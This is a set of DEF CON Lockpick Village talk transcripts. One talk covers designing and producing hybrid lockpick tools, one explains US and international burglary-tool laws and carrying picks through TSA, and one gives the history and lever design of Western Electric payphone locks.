out, you can actually put it on a key chain, and it's useful — and there are some that are definitely one-time use. They're still good, they work in a pinch, but I wanted something that was reusable and durable and things like that.
And I was trying to think of, you know, the spy-type stuff. That's when I came up with lockpick collar stays. I did the same process — this was before I even followed LockNoob — but it was like: I'm going to draw this out. This is definitely a hybrid tool: it stiffens my collar and it picks locks. Then I started taking actual collar stays and cutting them up and trying to make useful picks out of them. At that point I reached out to my brother-in-law, who is a machinist; we started cutting them up and trying them, and we started making them. You can see these are the mark one and mark two prototypes, where I had really sharp lines and things like that — it wasn't really smooth, that S-rake looks really dorky, so I started tweaking the S-rake, and the diamond pick looks ridiculous, so I worked on that. Still, realize this was the first time I'd ever done something like this. It's kind of like, okay, it may not be great at both things, but it's an interesting little spy gadget, what have you. So let's say you do that and get your prototypes working the way you want. Now it's time for manufacturing and production. I usually get my raw materials from McMaster-Carr. I like their website — you can order metal from there, and it's very specific on the type, the gauge, the dimensions. You pay more for it, but it's been pretty good for me. As far as production, you can either do it all yourself, if you have that kind of time, or do what I like to do: I actually pay someone. I have a metal shop that does precision laser cutting. I can give them my CAD drawings, I can give them the metal, and then they just charge me for thickness and laser runtime, so it's fairly affordable. And as far as shipping, I've done it both ways.
You know, you could have a Google Forms or Google Sites type thing, and once it's filled out, it sends the buyer to a PayPal button; PayPal handles the payment, and you handle the shipping and postage, stuff like that. It works pretty well. When I did my lockpick collar stays, I did crowdfunding through Kickstarter, and it was definitely a learning experience. There are some pros and cons — this is all my opinion on it. What's nice is it's a great platform to get your stuff out there. It handles all the campaigning and the deadlines, it reaches out to the buyers securely, they handle all the processing and such. It's great. There are some cons, though. Basically, there are taxes — no matter how you do this, you should be paying taxes, right? If you raise $20,000 or more from your backers, they give you tax forms; otherwise they're like, you take care of it yourself. Also, they can't be held liable in any way if you don't fulfill, or for payment issues and things like that. And when the campaign ends and you're funded, you don't immediately get the money — it could be anywhere from one to four weeks, because they're gathering money from the backers on your behalf. So my advice: figure out your design, your manufacturing, and your production first. Do not ever use the funds for your own research and development and figuring out mistakes, because I don't know how thin your margins are, but if you're doing crowdfunding and they're thin and you're using that money to figure out your mistakes, you're going to have a bad time. And always be responsive — reach out to people, have a Twitter presence, whatever, and make sure you fulfill commitments. So these are the lockpick collar stays I designed. These are actually the DEF CON 27 ones — I did a limited edition run of them with some laser etching.
So when in doubt, you know, lasers. Current projects I'm working on — I really only have one right now; I've had a bit more time because of COVID-19 and things like that. A little bit of backstory: my wife and I moved into a new house in December, and all the internal doors had different locks on them. Some took a small flat-head screwdriver, some were the push-pin kind, and some even had cheap Kwikset keyed handles — like, why are you putting this inside a house? And my kids would lock these and close the door. So I got to the point where I was always carrying a Sparrows Mini Jim around with me. And sometimes it would be the Kwikset, and I'd pull out my jackknife pick set or whatever and pick it open, because I didn't have the key to it. I eventually replaced the door knobs, and we ordered the little screwdriver keys for them, but I got thinking: it'd be nice to have a bypass tool where I can jim, but that I can also use to quick-pick or jiggle things open. Also, I didn't want to carry a traveler hook around in my pocket, because that's really sharp and uncomfortable. So, all right, let's apply the process. This is where I'm currently at. I definitely wanted a bypass tool — something I could latch-slip or loid with. I wanted a small form factor. I wanted something I could take on an airplane if I needed to: nothing sharp or bladed, under seven inches, reusable, durable, versatile, things like that. So I started looking at what was currently available. You have your Mini Jim. I started thinking about common keys — your CH751s — and then auto jigglers, which you can use for more than just cars. Also the wafer picks we showed earlier. I started thinking about the TSA007, because that's the most common TSA key, and then a shank or decoder type thing.
And then we go to the design phase. I'm a pen-and-paper kind of guy. What's nice about this is you can actually put the lockpick tools directly on the paper and trace them out — it's much easier than freehanding it. So I started sketching out the ideas and thinking about the different kinds of tools I wanted. At that point I switched over to CAD. Now, I've used both LibreCAD, which is open source — and you can tell it's open source — and Autodesk Fusion 360, which is great; it seems a lot more developed. It is a paid service, but you can get it through a student license, or they have a startup license if you make less than $100,000, that type of thing. So I started designing it, and it was really intuitive. I watched a couple of YouTube videos and some Pluralsight-type courses on how to use it, and that got me going pretty quick. So I designed it: I took a Mini Jim on the one side, and then I wanted a double-sided wafer pick on the other, and I built in a little finger well, because I think it's important that tools are comfortable in the hand — work on ergonomics. At that point you can extrude it out to the width you want, and start working with the designs and such. So that's what I did, and then I designed three more. These are my mark one prototypes. I put a hole in each because I was thinking, maybe you want a lanyard hole, or to put this on a key chain or something like that. At the top, working our way down, we have our CH751, and we have our double-sided wafer pick. The next two are auto jigglers that you could use as a double-sided auto jiggler, or as kind of a dull, shallower half-diamond pick. You can't see it too well, but I did try to add serrations.
In my next designs I actually need to tweak this a little — standardize the size of the Mini Jim side and things like that. I will say something about serrations: if you do put serrations in, they are nice, but make sure they're dull serrations. The way I found that works pretty well is half circles with lines connecting them. They're really nice — you can feel them, but they don't cut into you. Don't do sawtooth serrations. So, something to think about. At this point I had my mark one prototypes. I did a batch of — well, about 40 sets or so. I sent them out to a couple of people — I still have quite a few — but you can see a few things I want to change. In the wafer pick, you can see a little half circle that was cut out there; that was just a mistake by the manufacturer. And you can see the serrations didn't really come through — I didn't have a fine enough laser going. A couple of ideas I scrapped: the TSA007. The reason why is that this is 31-thousandths-of-an-inch (0.787 millimeter) steel, and the way the TSA007 is set up, it's more of a Z-shaped keyway; it just wasn't feasible. However, the CH751 works great — it works perfectly. I'm not going to change anything with that; I really like it. I also decided to get rid of the decoder, because if I want this to be TSA safe, I can't have a sharp spike on it. So, next steps: standardize the jim dimensions across all of them; fix that weird circle; change the tip profile on the wafer pick — notice there are actually two peaks at the point, on the top and the bottom, which makes it just a bit too thick, so I'm going to change those dimensions a little — and then deeper, more pronounced serrations. All right. So, kind of what I just said: keep improving prototypes, because I'm not happy with how they are yet.
But I do recommend you send them out to trusted friends who will give candid feedback. Don't send them to people who are only positive — "oh, this is so great, you're going to make a million dollars off this, so clever." Send them to people who know what they're talking about: "I can see the value of this; here's something I would change; here's how it feels in my hand." That's really valuable, because then you're getting the feedback you want, and if you're doing a crowdfunding type thing, you're not spending backer money figuring this out — you're paying for it up front. Raw materials and manufacturing — I've already covered that. And once you're happy, this is the point where you might want to reach out to lockpick companies and look at some kind of collaboration. Sparrows — I've reached out to them before, and they seem pretty good to work with. I don't have any negative feelings about them; I just decided not to go with them and to make it on my own. But I know other people have had success with it and been happy, and more power to them. As I said, I hire a metal shop to laser-cut these for me. I send them the CAD files — they're really good with CAD and can figure out the best layout to get the most out of my sheet metal, calculate costs, and things like that. And then distribution: are you going to ship domestic, or are you going to ship international? One thing I discovered is that I had all these international buyers for my collar stays — is this going to be customs friendly? I hadn't considered it, and said, you know what? I could probably have made more money, but I'm going to cover customs, because I don't want to be a jerk. But that's the point you get to: I want to make something good; I want people to be happy.
Yes, some people are going to think it's dumb — they don't have to buy it. Some people are going to think, hey, this is kind of cool, this is clever; it's something I might throw in my wallet, or, you know, I like this kind of hybrid tool, it's really interesting. So that's kind of where I'm at, and that is my talk, pretty much. I'm on Discord — I go by Didimus — and I'm also on Twitter if you want to send me a DM; I think they'll be open for a little while, same handle. If you have any questions, I'd be happy to answer them as best I can. And I'm curious to see what kind of hybrid PhySec tools you might have out there, what ideas you might have. So with that, I will say thanks, and enjoy the rest of the con.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices and the techniques used to exploit those vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge of the best methods and practices for protecting your own property.
10.5446/50747 (DOI)
Welcome, welcome, everybody, to a very unusual DEF CON. Lots of things are different; lots of things are staying the same, including, as always, the open organization of lockpickers' Lockpick Village. We're so glad you're here. We hope you can learn some things, have some fun, and walk out more fired up about hacking and lockpicking than you arrived. My particular part of this today is Law School for Lockpickers. What even is that? Well, by way of background, I'm Preston Thomas, a former board member of TOOOL. I'm a licensed attorney, barred in the District of Columbia and in California — which is importantly different from barred from DC and California. I've done this talk before, including at DEF CON, but 2020 has brought this topic into a new light. Security research of all kinds — hacking, reverse engineering, social engineering, lockpicking — relies on the civil liberties of an open society with rule of law. Hacking is by nature subversive; lockpicking is no different. Like journalists and priests and security researchers, our job is to comfort the afflicted and afflict the comfortable. We can do things many people don't understand, and for certain types of people, encountering something they don't understand makes them nervous, irrational, maybe even angry. I should know. I've worked with TOOOL for almost 10 years and been a lawyer for longer. When people get nervous, irrational, or angry about lockpicking topics, it often ends up on my plate — it falls to me to explain it. I've had this particular conversation hundreds of times. This talk today isn't for you; it's for me. I want to recruit all of you into my crusade to push back on the tide of bullshit about laws, and lockpicking, and how the two interact. I'm tired. I want to be done talking about this, but people won't let me. Help me. Please. Let's do this. To begin with, I am a lawyer. I am not, however, your lawyer. This is so, so not legal advice.
The only advice I'm going to give you today is: don't get your legal advice from a guy at a con. Also, my opinions are my own — they don't represent TOOOL or anyone I work for. Standard disclaimer. Law and Order was a great show because half was the cops and half was the lawyers. For the law part, you can just Google what the laws are in a specific jurisdiction, or how to talk to a law enforcement officer — there's great stuff on YouTube about that. This is not that talk. This talk is more the second part, the order part: why lockpicking laws are the way they are, and what that means for you as a practitioner dealing with lots of non-practitioners. Everyone has legal theories about lots of parts of daily life, not just lockpicking. Most of them are workable, some of them are nonsensical, and some of them are absolutely bananas. Where do loopy legal theories tend to come from? Armchair lawyers. Armchair lawyers everywhere, with their good old University of Wikipedia law degree. Their specialty area is something I like to call folk law. These are the ideas about law that everyone seems to know, but no one really seems to know where they came from. This is "I want my one phone call," or "if you ask someone if they're a cop, they have to tell you," or "I don't have to pay income taxes because I live in the free state of Jefferson." Because of folk law and all the people opining and spouting off about it, Googling about lockpicking laws on the internet is worse than Googling about that weird rash. So let's get real. Today, let's do this law school style: concrete, specific, and clear about how we use words. Let's start off this law school for lockpickers by building a law — a criminal statute called possession of burglary tools, because that's almost always what we're talking about when we're talking about the legality of lockpicks. Criminal laws are constructed of elements.
These elements are what need to be proven beyond a reasonable doubt before someone can be legally found guilty of a crime. In the case of a burglary tool statute, there are usually two elements. Possession is physically having a tool or device, including lockpicks. And intent means a criminal mindset, i.e., you intend to do something that is against the law. You can call this formula possession plus intent. Now, intent is difficult to get at. It's in your head. It's not something the court has access to. So typically in a court of law, it's shown through circumstances. In other words, part of the district attorney's job is to show circumstances that make it beyond a reasonable doubt that a person had crime in mind at the time they possessed lockpicks. No circumstances, no intent; no intent, no crime. In most states, it's as simple as that. Mere possession of lockpicks, without any circumstances indicating unlawful intent, is not a crime. You look across the map and you can see that is the vast majority of states. We color them green just because it's nice, it's soothing, it sends the right message. But what about those shadowy places, you say, in your best Jonathan Taylor Thomas, 1994 Simba voice? Remember how I said intent was really hard to get at? The court can't know; it's in someone's mind. So who better to provide evidence about the state of someone's mind than the person themselves? That is the thinking behind that minority of states that just throw up their hands and say, you tell me. I'm looking at you, Virginia, Ohio, Mississippi, Nevada. Laws change over time, but they pretty much solidified down to these four as having the possession implies intent formulation. So these states write their statutes so that possession of lockpicks is prima facie evidence of intent to commit a crime. We'll talk about prima facie here in a second. Here's an example from the Code of Virginia.
For those of you who like to follow along, this is Criminal Code 18.2-94: the possession of such burglarious tools, implements or outfit by any persons other than a licensed dealer shall be prima facie evidence of an intent to commit burglary, robbery or larceny. So let's talk about that prima facie phrase. It's not law school without some Latin, so let's dive into it. Prima facie literally means "on first face," or you can think of it as "on first impression." In plain English, that means: if I didn't know better, I'd say you're up to no good. Turning that back into legal language, that's referred to as a rebuttable presumption. It's a presumption because it starts off set to true, default value true. It's rebuttable because that default value can be changed, which means the ball is in your court. Or, in more colloquial terms, prima facie means you've got some explaining to do. And I put this gif up there, and I'm increasingly surprised how few people know what it's from. If you don't recognize this gif, congratulations on your high school graduation, I guess. Okay, so people will often say, but I have a presumption of innocence, it's in my Constitution, I've got rights. And you're right. You do have rights, at least for the time being. But the presumption of innocence is not one of the rights that's guaranteed in the Constitution. You can read it; it's not that long. You should read it, it's worth the read. And one of the things you'll notice is that there's no presumption of innocence mentioned in the Constitution. It flows indirectly from the Fifth, Sixth and Fourteenth Amendments. Coffin v. United States is one of the first cases you study in law school, and it shows how, even though it's not actually in the text, it was discovered as a necessary implication of the rights guaranteed explicitly in the Fifth, Sixth and Fourteenth Amendments.
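To make the contrast between the two formulations concrete, they can be sketched as a toy boolean model. This is emphatically not legal advice; the function names and structure below are invented for illustration only, and real statutes, burdens of proof, and evidentiary rules are far more nuanced than two booleans.

```python
# Toy model of the two "burglary tools" formulations discussed above.
# Purely illustrative; not legal advice, not any actual statute's logic.

def possession_plus_intent(has_tools: bool, circumstances_show_intent: bool) -> bool:
    """Majority rule: the state must prove BOTH elements beyond a
    reasonable doubt. No circumstances, no intent; no intent, no crime."""
    return has_tools and circumstances_show_intent

def possession_implies_intent(has_tools: bool, presumption_rebutted: bool) -> bool:
    """Minority rule (the Virginia-style statute quoted above): possession
    is prima facie evidence of intent, i.e. a rebuttable presumption.
    The intent element defaults to True and stays True unless rebutted."""
    if not has_tools:
        return False
    intent = True                 # default value: true
    if presumption_rebutted:
        intent = False            # the ball was in your court, and you returned it
    return intent

# A locksporter carrying picks with no suspicious circumstances:
assert possession_plus_intent(True, circumstances_show_intent=False) is False
# The same locksporter in a presumption state, who explains the hobby:
assert possession_implies_intent(True, presumption_rebutted=True) is False
# ...versus one who offers no lawful explanation at all:
assert possession_implies_intent(True, presumption_rebutted=False) is True
```

The asymmetry is the whole point: in the first function the prosecution carries the burden on both elements, while in the second the intent element's default value is set to true and the burden of changing it shifts to the defendant.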
More importantly, though, this formulation of burglary law just won't be challenged in court, because it's too much of an edge case to ever make it to trial. There's two things DAs hate: they hate crime, and they hate losing cases. And because of that, even if this formulation is arguably unconstitutional, or might be, it'll never get tested. If a case is such an edge case that you might be able to make a constitutional argument, the DA will shrug and throw it out. He doesn't want to go down that route. That's not what his job is. He's got much bigger fish to fry. So these kinds of problems, where the law is a little unclear and common sense doesn't seem to quite match up with the way the law is written, that's why humans are in the loop. There's district attorneys with prosecutorial discretion. There's judges sitting over each trial. They're specifically there to handle exceptions where the law as written doesn't quite match up with the facts on the ground. So even if you might have a constitutional problem with this formulation, know that it will probably never come to trial, because no one's going to care enough about a fact pattern like that to actually push it. Now, there's kind of a boo-hiss reaction to these states that have the possession implies intent formulation. A lot of people think they're just wrong, or nonsensical, or anti-hacker, anti-lockpicker. But if you look at what they're actually thinking, it begins to make a little more sense, and you have more sympathy for them. So I decided, let's look at some of them. First of all, I didn't know what the Nevada flag looked like. I had to look that up just for this presentation. Here's what Nevada decided, in a case from 1965 that is still good law.
They said: it is consistent with all the constitutional protections of accused men to throw on them the burden of proving facts peculiarly within their knowledge, and hidden from discovery by the government. This is an illustrative example of the kind of reasoning that motivates possession implies intent states. You don't have to agree with it, but you can see their thinking: if we're having a trial, and the goal of the trial is to find out what the truth is and whether someone is guilty, and that person has information relevant to the case that only they can provide, then the least they could do is show it to the court. It kind of makes sense. It's very simple. Maybe it makes some of our civil-liberties impulses a little squeamish, but it's not unreasonable. Especially when you consider the one that we collectively like a little bit better, which is the possession plus intent formulation, the more liberal version. So why shouldn't we imply intent? Here's an example from the District of Columbia that shows the kind of reasoning involved in arriving at the idea that possession plus intent should be the proper formulation. And what they say, and this is great close parsing by the judge, is: although the sledgehammer, axe and hacksaw which the appellant had quite clearly can be used criminally, they also may, and for the most part are, used for legitimate purposes. Since the mere fact of possession of such implements has no relevance to guilt, it may not be made the occasion of casting on the defendant the obligation of exculpation. In other words, unless what you're carrying is literally drugs, or something else that's similarly illegal just for existing, then the cops have to introduce additional facts to overcome the statistical likelihood that you intend to use them for a legal purpose. Most people carrying axes, sledgehammers, hacksaws, hammers, etc., are using them for legal purposes.
So why in this case would we infer that they're using it for anything other than a legal purpose? When you walk through it like that, it's kind of tortured logic, and you suddenly appreciate the people who say, you know what? It's probably what it looks like, unless you tell us otherwise. After doing the research for this, I have a lot more sympathy for the jurisdictions that decide to throw up their hands and say, you tell us. I know some of you in the back are saying, hey, aren't there different types of intent under the law? Yes, but that's not relevant here. Any intent will do for this particular formulation. Now, this kind of close parsing and close analysis of the way laws are written, and the meaning behind them, leads to some really funny outcomes, including my favorite lockpicking case. It turns out I have a favorite lockpicking case. We are once again back in the District of Columbia. This is a DC appeals court case, still relatively recent, from 2014. In re J.W. means it was a minor involved. So some kid under 18 got nicked by the cops under funny circumstances. Here's what happened. J.W. was arrested red-handed trying to steal a Vespa with a pair of bolt cutters. He was charged with possession of implements of a crime, which is the usual statute that applies to lockpicking. Both elements are satisfied, no question. You're sitting there in the middle of the night by the Vespa, bolt cutters in hand: the definition of caught red-handed. Absolutely possession, absolutely intent. However, there's inartful drafting in the statute, because the statute specified, and it doesn't usually specify, but in this case it did, tools for picking locks. A meticulous appeals court judge observed that picking a lock is generally understood to require skill rather than brute force, and to turn the lock without damage to the lock.
He literally went and looked up the definition of picking a lock in the dictionary, came back with that, and entered it in the record. As a result of reading the statute against the definitions, it was, the judge concluded, not physically possible to pick a lock with bolt cutters, nor is it legally possible to convict J.W. under the statute as written. Because, try as you might, those big old bolt cutters will not fit into the lock and turn it in a non-damaging fashion. Conclusion: no possession of tools designed for picking locks, and J.W. goes free. And anyone who complains about that gets to go back and write the statute a little bit more carefully. I think that is a great example of a judge carefully parsing the statute, holding the state to what they said they wanted, and then telling them: if you want something different, you have to be a little bit more careful. Another thing I like about this is it means we have it on record that all those savages and reprobates at conferences who destroy the locks and tie the lockpicks into pretzels are not, legally speaking, picking locks. So here's the part that I think a lot of people show up for. The A-number-one, absolute main area of shouting and nonsense regarding locks and lockpicking is speculation on breaking the link between possession and intent. So let's talk about it. In those states where possession implies intent, the minority of states, what can we do to protect ourselves? There's a thought that these are the places where lockpicks are illegal, that we have to be on our guard and have an answer ready. So what do we do about it? And something that often comes up is: how about a card? Have some kind of self-made card, or a more professional card, and poof, problem solved. This is that fantasy of holding it up to the officer and saying, don't worry officer, I have a permit for this. That couldn't be further from the truth.
There is no such thing as a get-out-of-jail-free card, because they're absolutely allowed to have that conversation with you. And by the time you're having that conversation, it is not in your interest to try to avoid it. Instead, if you're having a conversation about lockpicks with a cop, it is now in your interest to engage in, expand on, and own that conversation, rather than trying to flash some kind of card and dodge it. The TOOOL membership card, which is forthcoming, contains a few carefully crafted paragraphs to help you achieve a productive tone in that conversation. Essentially, it acts as a conversation starter. It's a way to help you have the conversation effectively, rather than avoid the conversation. It explains that TOOOL is an organization that exists, that recreational locksport is a thing that exists, that the holder of the card is a member of TOOOL, and it gives a gloss on the general state of the laws overall. It doesn't overplay its hand. It basically comes down to the idea that what we teach and what we do at TOOOL is legal everywhere in the United States, by definition, because locksporters and researchers have a legitimate use for their picks. They follow the two rules, which are quite famous in TOOOL: don't pick a lock that you don't own, and don't pick a lock upon which you rely. If you're following those rules, then you don't fall afoul of either formulation of state law, no matter where you are. That helps set the right tone. If you're a conscientious locksport practitioner, you know: don't hide them, don't lie about why you have them. Essentially, don't act guilty if you aren't guilty. People sometimes come to me and say, Preston, that's all well and good, but what if I'm doing this or that or the other thing? What about this circumstance?
And what I always tell them is: if what you're doing is a crime, then you're literally doing what the crime of possession of burglary tools describes, and you have no basis to complain. If, on the other hand, you are not, and you're practicing good locksport ethics and following TOOOL's rules, then you can be safe in knowing that what you are doing is legal in every state in the union, and you have a card to help explain that concept to anyone who's asking. Now, we are very serious about keeping our members and our friends on the right side of the law. Nonetheless, and I want to emphasize this is not legal advice, this is just wisdom that any person in this society should know, let me give you a rule of thumb. Call it the one-crime-at-a-time rule. If you choose to break the law, don't break the law while you're breaking the law. Don't accidentally turn a legitimate hobby into an indictable offense by carrying lockpicks along at a time when you shouldn't have them. In the words of legal philosopher William Smith, in the matter of Earth versus Giant Bug, 1997: don't start nothing, won't be nothing. I have heard from many police officers in many different jurisdictions. I've asked them; I have been on public transit sitting there picking on my practice locks, and I said, hey guys, I'm sitting here picking locks. I'm pretty sure that's acceptable. Do you have any problem with it? And they say: are you planning on picking a lock on the train? Are you planning on picking a lock on the airplane? They don't care. They have actual crimes to worry about. If you're sitting there as a law-abiding citizen doing something that's not bothering anybody, it's not worth their time. So don't be nervous about it. And don't worry about ignorance of the law becoming a problem for you, because you're willing to have that conversation. Another area that people oftentimes ask about is federal law, particularly TSA.
DEF CON is one of the most common sources of that question, because people say, well, I just bought lockpicks, but now I can't take them on an airplane. It's literally not a factor, because TSA has a set of things that they're looking for, and a set of things that are not on their list. Because a lockpicking tool is a non-sharp tool less than seven inches, it's carry-on approved. It's simply not disallowed, which means it's allowed. And don't say this to TSA if you're having that conversation, but the locks in the cockpit doors are not even pin tumbler locks. So, all the more reason for it not to be on their list. After years and years of asking them, and we've got a Twitter conversation from a bunch of different people here, their agents finally added lockpicks explicitly to the "What Can I Bring?" self-service site on their website. So if this is a concern for you and you would like a little extra backup, then feel free: go on the website, take a screenshot, print it out, throw it in your lockpick kit. I've done it; I know a lot of friends of mine in TOOOL have done it. We carried it around in our lockpick kits for years and years until it got ratty and torn up, then we threw it away, and we never used it. Once again, because TSA agents just don't care. But remember, like anything that you want to carry onto a plane, the TSA agent gets the last call. So be polite, be friendly, be patient with them. Whether you're doing an opt-out or bringing something unusual through carry-on, just make sure you have enough time to have the discussion without being rushed or flustered. Yes, I like opting out. There's good ethical reasons for it, even though it's sometimes a pain in the butt. If I'm in a hurry and I don't want to miss my flight, yeah, I'll go through the scanner. Carrying lockpicks is likewise. If I'm really in a hurry, I'll just check them.
But for the most part, I like carrying them on. A, because I know where they are, because they're valuable, and I can make sure they don't get broken. But also to make sure that I'm practicing what I preach when I tell people, yes, it's not a problem. And on the rare occasions I do have those conversations, I can make it that much easier for the next person coming behind me bringing lockpicks. One of the best pieces of advice I got in law school, for when you're having conversations like this, is: always try to seem like the most reasonable person in the room. If you seem like you're prepared for the conversation, if it's not a surprise for you, then that really helps them be that much more calm about it. As a last resort, many airports will give you the option to mail something home rather than trashing it. Another great option if you've got time to take advantage of it. Here's what I do when I'm taking my lockpicks through an airport. This is my bin on the inside of security at San Francisco. Note the gigantic bag of lockpicks, including the fuzzy handcuffs right on top, just in case anyone wants to get curious. That's all totally legal. As are the Bogota picks in my wallet, which are there on the right. No one ever notices those. Ironically, the illegal thing in the picture is that little bottle of Kraken rum there. I totally did not know that you're not allowed to bring little bottles through security onto the airplane; you're not allowed to provide your own booze. So yes, there is something illegal going on in that picture. No, it's not the lockpicks. Yes, it is the booze. A note on having fun with TSA. I like putting the handcuffs on top, because if they're going to open up the bag, I like to put a smile on their face. It gives them the problem of: do they dig around the handcuffs? Are they allowed to pick the handcuffs up? This is dildo-versus-your-dildo territory.
So as long as they're going to have the conversation, there's no reason we can't make it a little bit fun. And before you ask: yes, handcuffs are also legal, or rather also permitted, in carry-on. Lots of good reasons for that, including security officers and police officers who always travel with handcuffs. A few years ago, Lady Gaga brought her own fuzzy handcuffs and there was a bit of a hubbub about it, but they were, of course, allowed on. So, fun lockpick tricks: just carry fuzzy handcuffs as well. It helps set the conversation in the right mode. A comment that I got from Max, who works with TOOOL: he said, always remember that you can help the conversation along by giving some framing. So if you see your bag of lockpicks go through the X-ray, and the person's eyes kind of light up and they shunt it off to the side for further inspection, wave at the guy as you're walking over. That sets the conversation off just right: I see you've got my bag of lockpicking equipment there. I do locksport as a hobby. Inside you will find the following things. You can help them get in the right frame. And there's kind of an art to helping them arrive at their own conclusions, rather than dictating to them in a way that might make them suspicious. So don't avoid the conversation. Welcome the chance to practice the conversation. It's almost always no big deal, because, again, it's a non-sharp tool less than seven inches. Let's move past handcuffs and go on to the rest of the world. People will often ask me, now that I've talked about the United States, what about the rest of the world? And the answer is that the rest of the world does not differ materially from the United States, for the most part. Everywhere around the world, you'll find countries and individual jurisdictions with both formulations. The most common formulation is possession plus intent, but there are some places that have possession implies intent.
So the Commonwealth: UK, Australia, New Zealand, Canada. They're all legal. Some of them are possession plus intent, some of them are possession implies intent, but none of them make it strictly illegal. The Netherlands, as we know, TOOOL having started in the Netherlands: perfectly legal, and there's quite a robust culture there. Israel is a little bit more tightened down; they're definitely in the possession implies intent camp. And I'm given to understand that in China they're fairly illegal, but like many things in China, it depends on who your patron is. So yes, when TOOOL goes to China, we do take lockpicks with us. We teach lockpicking there, we get it all cleared through the proper authorities, and we haven't had a problem yet. Now, there's one last thing that needs to be said before I round this out, which is that 2020 is in some ways different than other years, and in some ways no different than it ever was; we're just learning more about it now. The Black Lives Matter movement has drawn a lot more attention to the interaction between young Black people, people of color, and law enforcement. And it wouldn't be right to finish this talk without mentioning that all the advice I gave works great if you are a white, reasonably well-educated male lawyer. Does it work as well if you're not some of those things? The only answer I can give you is: all the principles remain the same, but it is absolutely hard mode. It's no surprise that you might have to speak better, understand better, make yourself heard better to get the same results. And there's nothing that I can say to make that okay in this talk, or to really give a lot of insight from a perspective other than mine. But I do want to acknowledge that the law is the same and many of the same principles apply, but it's hard mode. So that is the laws of lockpicking. As we end this, I'll have a chance to take questions.
So for anyone who has questions about lockpicking in the US or around the world, who has stories they want to tell, who has hypotheticals they want to get insight on, I would be happy to take them. Mostly, thank you for showing up for this conversation. Happy lockpicking. Look forward to seeing you around.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices and the techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50748 (DOI)
Hey everyone, hope y'all are doing well. Hope everyone's staying safe out there. And welcome back to DEF CON Safe Mode. I'm Nothing, and yeah, so I'm going to be doing a video here. This is prerecorded, but I am going to be sitting there live with you, and this is going to be going over the infamous Western Electric 30C and how I was actually able to defeat this thing. So I'm going to start off sort of slow for those of you who don't know anything about this lock. And I'm actually going to start off talking about both of these here. So these locks are the result of a lot of research and development from the Western Electric Company to solve the problem of pay phones. So these are pay phone locks, and these were put into place during a time when people were not huge fans of phone companies and paying for phone calls and things like that. There was a lot of money that went into the research and development of these, and they were designed to be very resilient to everything from vandalism to weather and just all-around wear and tear, and also to surreptitious entry and manipulation. So there were a few locks before these, and the original patent that I'm aware of was released in 1966. The original patent covered many aspects of these locks, but there's some things in the patent that weren't on these, and there's some things on these that weren't in the patent. So this first one you see here is the Western Electric 29A, and this is the lock that would protect the electronics of the pay phone. It went in the upper portion and secured the upper housing of the pay phone, where all the electronic elements were. This is a five-lever tumbler lock. This is actually unsprung, which means that the levers do not have a spring that will return them to their zero position. Instead, when you turn the key back, there is a portion on the actuator that pushes on the lower part of the levers, which returns them all to the zero position.
Like I said, this has five levers, but this big gap you see in the key here is for a stationary ward that goes in between the front two levers and the rear three levers, which makes it so that if you were to try to reproduce a key, you would have to have that gap to fit through there. And also, in picking, this sits down pretty low, which makes it very difficult to get a picking wire behind it. So it definitely makes opening this lock without the key pretty difficult. All the levers in here had false gates as well as true gates, of course; else it wouldn't open. And actually, here I have one that has an acrylic face on it. So as you can see, there are no springs. You can't see much because of this copper plate here that guards the levers. But what you can see is, when I turn the key, all of those levers line up, and that silver part that you see in there is the stationary ward. So the fence also has a cutout to go past that ward and be able to open up. This is a part of the pay phone, but I'm not going to be spending a whole lot of time on this tonight. I just wanted to kind of give you a quick overview of this one so that you'd know the differences between this and the 30C. So the 30C is actually a lock with a pretty interesting history behind it. This lock was considered un-pickable for a very long time, and it was considered impossible to manipulate open until a man named James Clark figured out a way to get into it and went across the country back in the 1980s stealing over half a million dollars in coins from pay phones. He evaded the police by basically continuously moving, not really following any patterns. There were a couple little patterns that he followed: he would mainly hit large sporting events, casinos, places where a lot of people would be there and a lot of people would be using the phone.
And apparently he would just go into the booth, pretend to make a phone call, and while he was sitting there on the phone he would manipulate the box open, steal the coins, lock it back up and leave. Nobody knows how he actually got into these things. He was on America's Most Wanted twice. He was called everything in the newspapers from the pay phone bandit to the telephone bandit to the coin box bandit. I've heard some people actually call him the Phone Ranger, though I've never seen that in print anywhere, and I looked a lot. Honestly, all I found on the Phone Ranger was a crappy old comic book character. It was pretty funny. But anyway, he is pretty well known as the Phone Ranger among the community. But even though he was captured with his tools, and actually while he was working on one of these, excuse me, I'm going to have to sip a whiskey real quick, no one was ever able to figure out how he did it. Now, the Bell Company hired retired FBI agents and spent a pretty good amount of money trying to figure out how he was able to get into these locks, and to my knowledge they never made any progress on that point. So they spent quite a long time. These locks were from the single-slot Fortress pay phone, and locks in this family go back around 50 years altogether; some of them are still in places, but very rarely, because we all know how rarely pay phones are actually used these days. This model was continuously in service for, I think, about 30 years or so, and previous models went back quite a bit further than that. But anyway, he was ultimately arrested in 1988. They said he was identifiable by a ponytail, a baseball cap, and I think cowboy boots. And he was caught in a phone booth playing with a lock. But anyway, I hadn't heard about that story.
